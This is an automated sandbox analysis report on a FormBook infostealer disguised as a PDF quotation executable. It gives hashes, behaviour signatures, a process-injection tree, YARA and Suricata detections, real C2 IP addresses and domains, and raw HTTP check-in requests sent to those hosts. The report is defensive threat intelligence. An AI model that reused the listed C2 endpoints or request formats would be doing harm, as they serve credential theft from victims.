
Windows Analysis Report
Quotation request -30112024_pdf.exe

Overview

General Information

Sample name: Quotation request -30112024_pdf.exe
Analysis ID: 1557571
MD5: 8a44b6f23ceba13203e4dc3fb33aea3c
SHA1: 1fd1641755f1df2d11f42e5176ebcf2c7684661a
SHA256: 2166b87c378747df98dcbbb089b0d3a21cf5631e999e68447e804c4b48d25efb
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Quotation request -30112024_pdf.exe (PID: 4348 cmdline: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe" MD5: 8A44B6F23CEBA13203E4DC3FB33AEA3C)
    • svchost.exe (PID: 4876 cmdline: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • xvYhLzczmazJ.exe (PID: 5488 cmdline: "C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_isv.exe (PID: 4552 cmdline: "C:\Windows\SysWOW64\RMActivate_isv.exe" MD5: CB999CC05F196DCF7300A5D534B3BE7B)
          • xvYhLzczmazJ.exe (PID: 3736 cmdline: "C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2324 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
7.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
7.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", CommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, ParentProcessId: 4348, ParentProcessName: Quotation request -30112024_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", ProcessId: 4876, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", CommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, ParentProcessId: 4348, ParentProcessName: Quotation request -30112024_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe", ProcessId: 4876, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T13:12:53.485931+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53115 | 47.76.213.197 | 80 | TCP
2024-11-18T13:13:17.093699+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53152 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:31.532538+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53156 | 176.117.73.104 | 80 | TCP
2024-11-18T13:13:45.053482+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53160 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:59.085864+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53164 | 107.167.84.42 | 80 | TCP
2024-11-18T13:14:13.078566+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53168 | 176.32.38.130 | 80 | TCP
2024-11-18T13:14:27.024295+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53172 | 161.97.142.144 | 80 | TCP
2024-11-18T13:14:41.324493+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53176 | 203.161.46.205 | 80 | TCP
2024-11-18T13:14:56.235004+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 53180 | 20.2.36.112 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T13:13:09.437341+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53149 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:11.999199+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53150 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:14.530180+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53151 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:23.094046+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53153 | 176.117.73.104 | 80 | TCP
2024-11-18T13:13:25.812830+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53154 | 176.117.73.104 | 80 | TCP
2024-11-18T13:13:28.640925+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53155 | 176.117.73.104 | 80 | TCP
2024-11-18T13:13:37.411117+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53157 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:39.960092+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53158 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:42.463269+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53159 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:51.201404+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53161 | 107.167.84.42 | 80 | TCP
2024-11-18T13:13:53.754465+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53162 | 107.167.84.42 | 80 | TCP
2024-11-18T13:13:56.424552+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53163 | 107.167.84.42 | 80 | TCP
2024-11-18T13:14:05.141058+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53165 | 176.32.38.130 | 80 | TCP
2024-11-18T13:14:07.781687+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53166 | 176.32.38.130 | 80 | TCP
2024-11-18T13:14:10.517191+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53167 | 176.32.38.130 | 80 | TCP
2024-11-18T13:14:19.154386+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53169 | 161.97.142.144 | 80 | TCP
2024-11-18T13:14:21.698796+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53170 | 161.97.142.144 | 80 | TCP
2024-11-18T13:14:24.360270+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53171 | 161.97.142.144 | 80 | TCP
2024-11-18T13:14:33.633607+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53173 | 203.161.46.205 | 80 | TCP
2024-11-18T13:14:36.188442+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53174 | 203.161.46.205 | 80 | TCP
2024-11-18T13:14:38.756479+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53175 | 203.161.46.205 | 80 | TCP
2024-11-18T13:14:48.594377+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53177 | 20.2.36.112 | 80 | TCP
2024-11-18T13:14:51.141237+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53178 | 20.2.36.112 | 80 | TCP
2024-11-18T13:14:53.656857+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 53179 | 20.2.36.112 | 80 | TCP

                AV Detection

Source: Quotation request -30112024_pdf.exe | Avira: detected
Source: Quotation request -30112024_pdf.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Quotation request -30112024_pdf.exe | Joe Sandbox ML: detected
Source: Quotation request -30112024_pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xvYhLzczmazJ.exe, 0000000A.00000000.1561536330.00000000000EE000.00000002.00000001.01000000.00000005.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1722910301.00000000000EE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298534176.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, Quotation request -30112024_pdf.exe, 00000002.00000003.1299779489.0000000004490000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1546649019.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1544927146.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1641739098.0000000003165000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.000000000365E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1644453148.000000000331A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298534176.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, Quotation request -30112024_pdf.exe, 00000002.00000003.1299779489.0000000004490000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1641673492.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1546649019.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1544927146.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, RMActivate_isv.exe, 0000000B.00000003.1641739098.0000000003165000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.000000000365E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1644453148.000000000331A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rmactivate_isv.pdb source: svchost.exe, 00000007.00000003.1605760726.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1605855367.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576053827.000000000420D000.00000004.00000001.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576936987.00000000042AA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: rmactivate_isv.pdbGCTL source: svchost.exe, 00000007.00000003.1605760726.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1605855367.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576053827.000000000420D000.00000004.00000001.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576936987.00000000042AA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.00000000288EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.00000000288EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 2_2_004339B6
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_00452492
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00442886
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_004788BD
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 2_2_0045CAFA
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00431A86
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 2_2_0044BD27
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0045DE8F FindFirstFileW,FindClose, 2_2_0045DE8F
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0044BF8B
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 11_2_02E1C380 FindFirstFileW,FindNextFileW,FindClose, 11_2_02E1C380
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 4x nop then xor eax, eax 11_2_02E09EE0
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 4x nop then pop edi 11_2_02E0E033
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 4x nop then mov ebx, 00000004h 11_2_033E04DF

                Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53115 -> 47.76.213.197:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53152 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53156 -> 176.117.73.104:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53160 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53157 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53151 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53153 -> 176.117.73.104:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53149 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53158 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53165 -> 176.32.38.130:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53154 -> 176.117.73.104:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53166 -> 176.32.38.130:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53173 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53159 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53174 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53162 -> 107.167.84.42:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53163 -> 107.167.84.42:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53177 -> 20.2.36.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53170 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53179 -> 20.2.36.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53150 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53175 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53180 -> 20.2.36.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53167 -> 176.32.38.130:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53155 -> 176.117.73.104:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53164 -> 107.167.84.42:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53169 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53168 -> 176.32.38.130:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53161 -> 107.167.84.42:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53176 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53171 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:53172 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:53178 -> 20.2.36.112:80
Source: DNS query: www.egyshare.xyz
Source: DNS query: www.tals.xyz
Source: DNS query: www.acc888ommodate.xyz
Source: DNS query: www.070002018.xyz
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | IP Address: 161.97.142.144
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: CONTABODE
Source: Joe Sandbox View | ASN Name: VODAFONE-TRANSIT-ASVodafoneNZLtdNZ
Source: Joe Sandbox View | ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 identical entries)
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004422FE InternetQueryDataAvailable,InternetReadFile,2_2_004422FE
                Source: global trafficHTTP traffic detected: GET /yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ytsd88.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.egyshare.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.bionanosolutions.infoUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.tals.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
